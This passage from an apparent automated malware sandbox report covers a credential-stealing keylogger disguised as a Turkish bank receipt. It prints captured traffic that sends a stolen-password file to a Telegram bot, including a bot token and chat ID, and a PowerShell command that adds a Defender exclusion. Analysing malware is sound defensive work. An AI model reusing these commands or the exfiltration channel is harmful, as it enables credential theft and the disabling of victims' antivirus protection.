cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1618&rtt_var=1365&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=627552&cwnd=178&unsent_bytes=0&cid=2f8e788281c1232c&ts=147&x=0"
2025-01-09 18:11:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49809	104.21.96.1	443	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:11:23 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 18:11:23 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761072 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uqVhK6r31sDS1bZO5Wr4S7vemF49Xow2QETq%2FLpa29oJzFvEmgSSFT0hcgyV73BBAOaL3%2BLwYJvA5kJy1tomHAxszZ39gWoraqRHFEO8VaMXDH5lWeVe6TW01uWYN2w1ibH%2FgRt3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff663b649d772a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1971&rtt_var=750&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1449131&cwnd=212&unsent_bytes=0&cid=09f78d4ac313014e&ts=153&x=0"
2025-01-09 18:11:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49821	104.21.96.1	443	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:11:24 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 18:11:24 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761073 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxy6om%2F3GOCAJyVrSxrSHqcAU0fDQa04ifWBEg8kbWFoI5oKY3Xz5uEnhTdSqA0QpWoSWd77REfZj12f8mmI3Bm6Y%2B%2F1NiCjHXDwlFHGfwf671ZePWJTZHuCIfC0rFyBfZg8AM5z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff663bd7b9572a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1959&rtt_var=764&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1405873&cwnd=212&unsent_bytes=0&cid=a1c1c07ea943e985&ts=149&x=0"
2025-01-09 18:11:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49833	104.21.96.1	443	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:11:26 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-09 18:11:26 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:11:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1761075 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tbpqQSutlRmYEjEMdFYKD%2B9Pr5F0vrrDTuWuEliNIdn6EwhqfUOzK%2BuDdcuefnt7khoRDDKuf21CUqSAZM1wya0JfIvwv6D%2Bn%2FXDvG2oU3T2C%2B4Ixay6ICkTGnSLCAVlxO3SQAt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff663cb3ea11a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=65215&min_rtt=45475&rtt_var=31153&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=64211&cwnd=157&unsent_bytes=0&cid=54c37c839add9712&ts=204&x=0"
2025-01-09 18:11:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49839	149.154.167.220	443	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:11:27 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:082561%0D%0ADate%20and%20Time:%2010/01/2025%20/%2003:04:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20082561%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-09 18:11:27 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 18:11:27 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 18:11:27 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49882	149.154.167.220	443	7540	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:11:34 UTC	343	OUT	POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd31909a832222 Host: api.telegram.org Content-Length: 580
2025-01-09 18:11:34 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 39 30 39 61 38 33 32 32 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 74 69 6e 61 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 38 32 35 36 31 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 39 2f 30 31 2f 32 30 32 35 20 2f 20 31 33 3a 31 31 3a 31 31 0d 0a Data Ascii: --------------------------8dd31909a832222Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:082561Date and Time: 09/01/2025 / 13:11:11
2025-01-09 18:11:34 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 18:11:34 GMT Content-Type: application/json Content-Length: 530 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 18:11:34 UTC	530	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 31 31 31 32 37 33 37 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 65 6c 47 72 6f 75 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 65 6c 31 30 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 37 33 32 36 38 32 30 34 31 2c 22 74 69 74 6c 65 22 3a 22 44 65 6c 65 74 65 64 20 47 72 6f 75 70 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 34 34 36 32 39 34 2c 22 64 6f 63 75 6d 65 6e Data Ascii: {"ok":true,"result":{"message_id":13760,"from":{"id":7611127374,"is_bot":true,"first_name":"DelGroup","username":"Del101bot"},"chat":{"id":-4732682041,"title":"Deleted Group","type":"group","all_members_are_administrators":true},"date":1736446294,"documen

Target ID:	0
Start time:	13:11:09
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"
Imagebase:	0x4b0000
File size:	740'352 bytes
MD5 hash:	88398F906322EC15187390184B930A71
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:11:11
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"
Imagebase:	0x480000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:11:11
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:11:11
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"
Imagebase:	0x120000
File size:	740'352 bytes
MD5 hash:	88398F906322EC15187390184B930A71
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:11:11
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"
Imagebase:	0x6b0000
File size:	740'352 bytes
MD5 hash:	88398F906322EC15187390184B930A71
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	183
Total number of Limit Nodes:	10

Executed Functions

Function 06F0F3D1 Relevance: .9, Instructions: 857COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae682653966ba26348288d5746925919f2b188d2d7a6e31b838f8e2ab65ff7fe
Instruction ID: 5b37e4d010dd15a63124d945beb98da9b7bcb5c5faa9f45014d7e0bde843673a
Opcode Fuzzy Hash: ae682653966ba26348288d5746925919f2b188d2d7a6e31b838f8e2ab65ff7fe
Instruction Fuzzy Hash: 33824974A01214CFEB64DF69C844B69B7F6FF89310F218599E84AAB3A1DB309D81CF51

Function 06F05D18 Relevance: .5, Instructions: 524COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9652c6533cb6f88977ea13ed2e40e4b58f3ce0f72b4ffb6efe74931f78bdf2f4
Instruction ID: fcd0b883d7aa5b0e912cd193f6bc65fbcf26a4d5582904b6047e61456ad376a6
Opcode Fuzzy Hash: 9652c6533cb6f88977ea13ed2e40e4b58f3ce0f72b4ffb6efe74931f78bdf2f4
Instruction Fuzzy Hash: BB126034F002158FEB54DF68C984AAEB7F6FF89610B148169E506EB3A1DB71DC41DBA0

Function 06F4D7F0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef5a2e3f1bf09c892412a2c563987e3f4443040f586ca7edb09e60cc1afd62d
Instruction ID: 7811ceb5cbc24796e5f8321812e46dd2ae0c30af8ae77a0c3031cf3f478365e3
Opcode Fuzzy Hash: 3ef5a2e3f1bf09c892412a2c563987e3f4443040f586ca7edb09e60cc1afd62d
Instruction Fuzzy Hash: ED223730E01219CFDB64DF64C884BADBBB2BF89304F1480A9E90A9B695DB31DD85CF51

Function 00F73E28 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1380080625.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d19536506ae002186af002b67b27f7699447873700161c810661ee85843616e1
Instruction ID: ee6326651dea23007eaf411c7d2d5f9f24ff1e6e560a7e2dd730d9d423eb022a
Opcode Fuzzy Hash: d19536506ae002186af002b67b27f7699447873700161c810661ee85843616e1
Instruction Fuzzy Hash: ECD19F74E002188FDB54DFA9D984B9DBBB2FF89300F1085AAD509AB365DB309D86CF51

Function 00F77019 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1380080625.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8044a6fb7d0809a70ff0981f3458cde3d184d7e05ffef3327838726ca7c2d278
Instruction ID: 18ec8d941a4faf127d5635efdabaab788ab8fcc01c7e23bd6abedf504ebe6f9f
Opcode Fuzzy Hash: 8044a6fb7d0809a70ff0981f3458cde3d184d7e05ffef3327838726ca7c2d278
Instruction Fuzzy Hash: 6AB19174E01218CFDB54DFA9D984A9DBBB2FF89300F1485AAD409AB365DB309D46CF50

Function 088B9D79 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91b4ebe1b442f994b36bfdd4fb0902d39f84154cbfb1ba543248c562b46546d8
Instruction ID: cf0a0ba37388772d4ae0813131b4ba1d9ce3ed01cf0312ea3ca6daccd5d90a63
Opcode Fuzzy Hash: 91b4ebe1b442f994b36bfdd4fb0902d39f84154cbfb1ba543248c562b46546d8
Instruction Fuzzy Hash: EDA00214CAF118C080241D5408504F4E53C42DB14BF403460C10AF33123411C008811D

Function 00F7D6B0 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00F7D73E
GetCurrentThread.KERNEL32 ref: 00F7D77B
GetCurrentProcess.KERNEL32 ref: 00F7D7B8
GetCurrentThreadId.KERNEL32 ref: 00F7D811

Memory Dump Source

Source File: 00000000.00000002.1380080625.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3b93f0741abd4babb6806f760a38afddff33f16e62f36bd200f1057e5d559d1b
Instruction ID: b733cb13401cf3a72327ac5f8668fac0aeb808a50282cad5a9b385fac35abb23
Opcode Fuzzy Hash: 3b93f0741abd4babb6806f760a38afddff33f16e62f36bd200f1057e5d559d1b
Instruction Fuzzy Hash: 6C5177B0D007498FEB04CFA9D58879EBBF1EF88314F20C45AD409A73A1DB749946CB66

Function 00F7D6C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00F7D73E
GetCurrentThread.KERNEL32 ref: 00F7D77B
GetCurrentProcess.KERNEL32 ref: 00F7D7B8
GetCurrentThreadId.KERNEL32 ref: 00F7D811

Memory Dump Source

Source File: 00000000.00000002.1380080625.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a09df552570cdf25bb32a0ddbd2ef818c638c7c0b32e9058180130f155a1a39a
Instruction ID: 6f6ee2bca905eed80074fd406769f3ee88956e67f25ceb4d4c1af6d43d133337
Opcode Fuzzy Hash: a09df552570cdf25bb32a0ddbd2ef818c638c7c0b32e9058180130f155a1a39a
Instruction Fuzzy Hash: 695177B0D007498FDB14CFAAD588B9EBBF1EF88314F20C45AE009A7391DB749945CB66

Function 06FB0EB8 Relevance: 3.3, Instructions: 3309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d4d1f1d1f629e272c8726c982614304b9f7c34446ca145cba04005d8fc4059
Instruction ID: 5e4501f487360ae68d5bd1ec62f0d8879d9459089eea292f535d08c6f0fa5111
Opcode Fuzzy Hash: 65d4d1f1d1f629e272c8726c982614304b9f7c34446ca145cba04005d8fc4059
Instruction Fuzzy Hash: C8635B70A40329AFEB359BA0CC55BDEB772EF88700F1040D9E20A7B2D1DA751E859F59

Function 06FB8E68 Relevance: 2.7, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%*&/)(#$^@!~-_, xrefs: 06FB8EA1
0,,q, xrefs: 06FB8ECA

Memory Dump Source

